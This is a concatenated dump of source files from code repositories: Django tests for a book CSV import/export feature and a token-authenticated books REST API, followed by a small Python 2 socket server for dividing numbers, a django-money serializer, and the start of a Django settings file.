'birthday': datetime.date(2000, 10 ,13),
}
)
obj_createdEditorA, _ = Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'created editor A',
'sex': Editor.Sex.FEMALE,
}
)
obj_createdEditorB, _ = Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'created editor B',
'sex': None,
}
)
Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'book A',
'author': obj_authorA
}
)
Book.objects.update_or_create(
id = 2,
defaults = {
'name': 'book B',
'author': obj_authorB
}
)
Book.objects.update_or_create(
id = 3,
defaults = {
'name': 'book C',
'author': obj_authorC
}
)
obj_book, _ = Book.objects.update_or_create(
id = 4,
defaults = {
'name': 'book D',
'author': None
}
)
obj_book.editors.set([obj_createdEditorA, obj_createdEditorB])
obj_book.save()
def test_001(self):
"""
CSVImputForm のバリデーションエラー
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,"added, name",,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_002(self):
"""
UnicodeDecodeError
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,"added, name",,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText.encode('shift-jis'))
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_003(self):
"""
必要なカラムタイトルが存在しない
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名
5,"added, name",
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_004(self):
"""
バリデーションエラーとなるレコードが一部存在する
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,"added, name",author C,"created editor A,created editor B"
6,added name,author D,
7,added name,,\\
8,added name,,\\a
9,added name,,created editor C
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
5,"added, name",author C,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_005(self):
"""
名前フィールドが他レコードと重複している
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,book D,,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_006(self):
"""
置き換えモードで全て削除
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'replace',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_007(self):
"""
デッドロックの発生(既定回数内)
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,added name,,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
with mock.patch(
target = 'index.views.Book.objects.update_or_create',
side_effect =
[OperationalError('database is locked')] * (INT_TIMES_OF_RETRYING_CAUSE_OF_DEADLOCK - 1) +
[Book.objects.update_or_create(
id = 5,
defaults = {
'name': 'added name',
'author': None
}
)],
):
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
5,added name,,
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
    def test_008(self):
        """
        Deadlock occurs (retry limit exceeded).

        Every retry raises ``OperationalError``, so the import gives up and
        row 5 must NOT appear in the exported CSV.
        """
        str_toImportCSVText = textwrap.dedent('''\
            ID,著書名,著者名,編集者名
            5,added name,,
            ''')
        # Normalize line endings to `\r\n`
        str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
        str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
        str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
        obj_csvfile = ContentFile(str_toImportCSVText)
        obj_csvfile.name = 'books.csv'
        dict_toImportData = {
            'file': obj_csvfile,
            'mode': 'update',
        }
        with mock.patch(
            target = 'index.views.Book.objects.update_or_create',
            side_effect =
                [OperationalError('database is locked')] * INT_TIMES_OF_RETRYING_CAUSE_OF_DEADLOCK,
        ):
            obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
            self.assertEqual(obj_response.status_code, 302)
            self.assertEqual(obj_response.url, '/')
        obj_response = self.client.get('/export_as_csv/')
        str_expected = textwrap.dedent('''\
            ID,著書名,著者名,編集者名
            1,book A,author A,
            2,book B,author B,
            3,book C,author C,
            4,book D,,"created editor A,created editor B"
            ''')
        # Normalize line endings to `\n`
        str_expected = re.sub(r'\r\n', r'\n', str_expected)
        str_expected = re.sub(r'\r', r'\n', str_expected)
        str_behavior = obj_response.content.decode('utf-8-sig')
        str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
        str_behavior = re.sub(r'\r', r'\n', str_behavior)
        self.assertEqual(str_behavior, str_expected)
class BookCreateAPIViewTest(TestCase):
    """Tests for BookCreateAPIView (POST /api/v1/books/create/) with token auth."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        # API token used in the Authorization header of every request below.
        self.obj_token = TokenForRESTAPI.objects.create(
            user = obj_user,
            expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # add 7 days
        )
    def test_001(self):
        """
        Duplicate book name is rejected with HTTP 400.
        """
        Book.objects.create(
            name = 'created book',
            author = None,
        )
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book",
                        "author": ""
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertContains(obj_response, 'この 名前 を持った Book が既に存在します。', status_code = 400)
    def test_002(self):
        """
        Nonexistent author name is rejected with HTTP 400.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book",
                        "author": "Author A"
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertContains(obj_response, '指定された著者名 `Author A` は存在しません。', status_code = 400)
    def test_003(self):
        """
        Specifying the author field links the book to the existing author.
        """
        Author.objects.create(
            name = 'Author A',
            birthday = datetime.date(1999, 12, 24),
        )
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book",
                        "author": "Author A"
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'created book').author.birthday, datetime.date(1999, 12, 24))
    def test_004(self):
        """
        Omitting the author field leaves the book's author as None.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book"
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'created book').author, None)
    def test_005(self):
        """
        An empty-string author field leaves the book's author as None.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book",
                        "author": ""
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'created book').author, None)
    def test_006(self):
        """
        Nonexistent editor name is rejected with HTTP 400.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book",
                        "editors": [
                            "editor A"
                        ]
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertContains(obj_response, '指定された編集者名 `editor A` は存在しません。', status_code = 400)
    def test_007(self):
        """
        Specifying the editors field links the listed existing editors.
        """
        Editor.objects.create(
            name = 'Editor A',
            sex = Editor.Sex.FEMALE,
        )
        Editor.objects.create(
            name = 'Editor B',
            sex = None,
        )
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book",
                        "editors": [
                            "Editor A",
                            "Editor B"
                        ]
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'created book').editors.all()[0].name, 'Editor A')
        self.assertEqual(Book.objects.get(name = 'created book').editors.all()[1].name, 'Editor B')
    def test_008(self):
        """
        An empty editors list creates the book with no editors attached.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "name": "created book",
                        "editors": []
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/create/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'created book').editors.all().count(), 0)
class BookListAPIViewTest(TestCase):
    """Tests for BookListAPIView (GET /api/v1/books.json/) with token auth."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        # API token used in the Authorization header of every request below.
        self.obj_token = TokenForRESTAPI.objects.create(
            user = obj_user,
            expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # add 7 days
        )
    def test_001(self):
        """
        Query-string validation OK: filtering by both id and name returns
        only the matching book, including its editors.
        """
        obj_authorA, _ = Author.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'author A',
            }
        )
        obj_authorB, _ = Author.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'author B',
                'birthday': None,
            }
        )
        obj_authorC, _ = Author.objects.update_or_create(
            id = 3,
            defaults = {
                'name': 'author C',
                'birthday': datetime.date(2000, 10 ,13),
            }
        )
        Book.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'book A',
                'author': obj_authorA
            }
        )
        Book.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'book B',
                'author': obj_authorB
            }
        )
        editor1, _ = Editor.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'createdEditor1',
                'sex': Editor.Sex.FEMALE,
            }
        )
        editor2, _ = Editor.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'createdEditor2',
                'sex': None,
            }
        )
        obj_id3, _ = Book.objects.update_or_create(
            id = 3,
            defaults = {
                'name': 'book C',
                'author': obj_authorC
            }
        )
        obj_id3.editors.set([editor1, editor2])
        obj_id3.save()
        Book.objects.update_or_create(
            id = 4,
            defaults = {
                'name': 'book D',
                'author': None
            }
        )
        # Only book 3 matches the id/name filter below.
        dict_expected = {
            'books': [
                {
                    'id': 3,
                    'name': 'book C',
                    'author': 'author C',
                    'editors': [
                        "createdEditor1",
                        "createdEditor2"
                    ]
                },
            ]
        }
        obj_response = self.client.get(f'/api/v1/books.json/?id={obj_id3.id}&name={obj_id3.name}', HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}')
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(json.loads(obj_response.content.decode('utf-8')), dict_expected)
class BookUpdateAPIViewTest(TestCase):
    """Tests for BookUpdateAPIView (POST /api/v1/books/update/) with token auth."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        # API token used in the Authorization header of every request below.
        self.obj_token = TokenForRESTAPI.objects.create(
            user = obj_user,
            expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # add 7 days
        )
        # Fixture: one author and two books the tests update.
        Author.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'author A',
            }
        )
        Book.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created book 1',
                'author': None,
            }
        )
        Book.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'created book 2',
                'author': None,
            }
        )
    def test_001(self):
        """
        Renaming a book to an already-used name is rejected with HTTP 400.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "created book 1",
                        "author": ""
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertContains(obj_response, 'この 名前 を持った Book が既に存在します。', status_code = 400)
    def test_002(self):
        """
        Specifying an existing author links the updated book to it.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "updated book",
                        "author": "author A"
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'updated book').author.name, 'author A')
    def test_003(self):
        """
        Nonexistent author name is rejected with HTTP 400.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "updated book",
                        "author": "author B"
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertContains(obj_response, '指定された著者名 `author B` は存在しません。', status_code = 400)
    def test_004(self):
        """
        Omitting the author field leaves the book's author as None.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "updated book"
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'updated book').author, None)
    def test_005(self):
        """
        An empty-string author field leaves the book's author as None.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "updated book",
                        "author": ""
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'updated book').author, None)
    def test_006(self):
        """
        Nonexistent editor name is rejected with HTTP 400 and no editors
        are attached.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "updated book",
                        "editors": [
                            "Editor A"
                        ]
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 400)
        # NOTE(review): this asserts on book 1 while the update targeted
        # book 2 — confirm whether that is intentional.
        self.assertEqual(Book.objects.get(name = 'created book 1').editors.all().first(), None)
    def test_007(self):
        """
        Specifying the editors field links the listed existing editors.
        """
        Editor.objects.create(
            name = 'Editor A',
            sex = Editor.Sex.FEMALE,
        )
        Editor.objects.create(
            name = 'Editor B',
            sex = None,
        )
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "updated book",
                        "editors": [
                            "Editor A",
                            "Editor B"
                        ]
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'updated book').editors.all()[0].name, 'Editor A')
        self.assertEqual(Book.objects.get(name = 'updated book').editors.all()[1].name, 'Editor B')
    def test_008(self):
        """
        An empty editors list clears the book's editors.
        """
        str_input = textwrap.dedent('''\
            {
                "books": [
                    {
                        "id": 2,
                        "name": "updated book",
                        "editors": []
                    }
                ]
            }
            ''')
        obj_response = self.client.post(
            '/api/v1/books/update/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
            data = str_input,
            content_type = 'application/json',
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.get(name = 'updated book').editors.all().count(), 0)
class BookDeleteAPIViewTest(TestCase):
    """Tests for BookDeleteAPIView (DELETE /api/v1/books/<id>/delete/) with token auth."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        # API token used in the Authorization header of every request below.
        self.obj_token = TokenForRESTAPI.objects.create(
            user = obj_user,
            expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # add 7 days
        )
        # Fixture: two books; test_001 deletes book 1, test_002 targets a
        # nonexistent id (3).
        self.obj_book1, _ = Book.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created book 1',
                'author': None,
            }
        )
        self.obj_book2, _ = Book.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'created book 2',
                'author': None,
            }
        )
    def test_001(self):
        """
        Deletion of an existing book succeeds and removes the row.
        """
        obj_response = self.client.delete(
            f'/api/v1/books/{self.obj_book1.id}/delete/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}'
        )
        self.assertEqual(obj_response.status_code, 200)
        self.assertEqual(Book.objects.filter(id = self.obj_book1.id).first(), None)
    def test_002(self):
        """
        Deletion of an unknown id fails with HTTP 404.
        """
        obj_response = self.client.delete(
            f'/api/v1/books/3/delete/',
            HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}'
        )
        self.assertContains(obj_response, 'Specified Book ID: 3 not found.', status_code = 404)
| [
"38835246+yakenohara@users.noreply.github.com"
] | 38835246+yakenohara@users.noreply.github.com |
14064a81e2b808d01e665ab242a0573a2ea70c9c | e3c1293330abb922eeee1c6d0b0a3ecfde09ddbc | /django_money_example/core/serializers.py | 2aa137c888132e20b6bd5e5a1ec17a4cc6fe5ee2 | [] | no_license | jrocketfingers/django-money-example | 4a0cc70afa86b41e1fe3d692882012c3fd005c47 | ecf673b48ce2738aa5b3ea8122b32669a591c74e | refs/heads/master | 2022-07-07T22:58:16.790778 | 2019-11-27T09:51:26 | 2019-11-27T09:51:26 | 223,743,533 | 1 | 0 | null | 2021-02-01T03:35:02 | 2019-11-24T12:51:47 | Python | UTF-8 | Python | false | false | 414 | py | from djmoney.contrib.django_rest_framework.fields import MoneyField
from rest_framework import serializers
from core import models
class ExampleSerializer(serializers.ModelSerializer):
    """Model serializer exposing the money value as an amount/currency pair."""
    # MoneyField reads the model's `display` attribute for the amount and
    # pairs it with the `display_currency` field for (de)serialization.
    display_amount = MoneyField(source="display", currency_field_name="display_currency")
    class Meta:
        model = models.ExampleModelWithMoneyFieldFromTheGetGo
        fields = ("display_amount", "display_currency",)
| [
"developer94@gmail.com"
] | developer94@gmail.com |
73763af66d53b49e26248a0b1e2ab7d4457fd071 | f578b4e325c0b6fae17973f7228bafb03c1a2c43 | /Taller9/server_dividir.py | e0bcda91e13d0a02c8547fe765feb3dbc18943d7 | [] | no_license | Kalugy/Distribuidos | 53e21e2a1d6ff0450547c0c0ad8705c68caf9282 | d4f790511391d8cd423b53b630e61d68d94aa6c9 | refs/heads/master | 2020-03-26T22:50:30.255335 | 2018-12-19T22:10:55 | 2018-12-19T22:10:55 | 145,491,010 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,015 | py | import socket
import sys
import thread
import math
def dividir(numero1, numero2):
    """Return the quotient of `numero1` divided by `numero2`."""
    cociente = numero1 / numero2
    return cociente
# Listening TCP socket: bound to all interfaces on port 7500, backlog of 10.
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.bind(('', 7500))
s1.listen(10)
def connection(sc, addr):
num=str(sc1.recv(1024))
palabra1=""
palabra2=""
palabra3=""
cuenta=0
contador=0
#cuando cuantas veces esta un signo dentro de la palabra y las separa segun la cantidad de signos
for carac in num:
if carac == ' ':
cuenta+=1
else:
contador+=1
if cuenta==0:
palabra1+=carac
if cuenta==1:
palabra2+=carac
if cuenta==2:
palabra3+=carac
suman = str(dividir(float(palabra1), float(palabra3)))
print 'los numeros recibidos son: ' , palabra1, 'y', palabra3, 'y la dividir es: ', suman
sc1.send(suman)
print "respondiendo..."
# Accept loop: spawn one handler thread per incoming client connection.
while 1:
    sc1, addr = s1.accept()
    print "recibida conexion de la IP: " + str(addr[0]) + "puerto: " + str(addr[1])
    print "\n"
    thread.start_new_thread(connection,(sc1,addr))
# NOTE(review): the loop above never exits, so these close() calls are
# unreachable dead code.
sc1.close()
s1.close()
| [
"nico0829@utp.edu.co"
] | nico0829@utp.edu.co |
d06f05cbb6eeab2c73ba51f9a73a2e19cda51879 | 251a104dc767ec57a88d6504710091ace3ce5359 | /untitled3/settings.py | e7505be28e66b0f6284f29ef99f82bc9bfa11d2d | [] | no_license | katandser/Site_Django | e43399d44ed1f1df4f0024372231ea3db3da5ff0 | ae2df382fac579a73e0b960695e5e6becd07d139 | refs/heads/master | 2020-05-09T19:19:34.296717 | 2019-04-14T23:30:37 | 2019-04-14T23:30:37 | 181,374,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,173 | py | """
Django settings for untitled3 project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
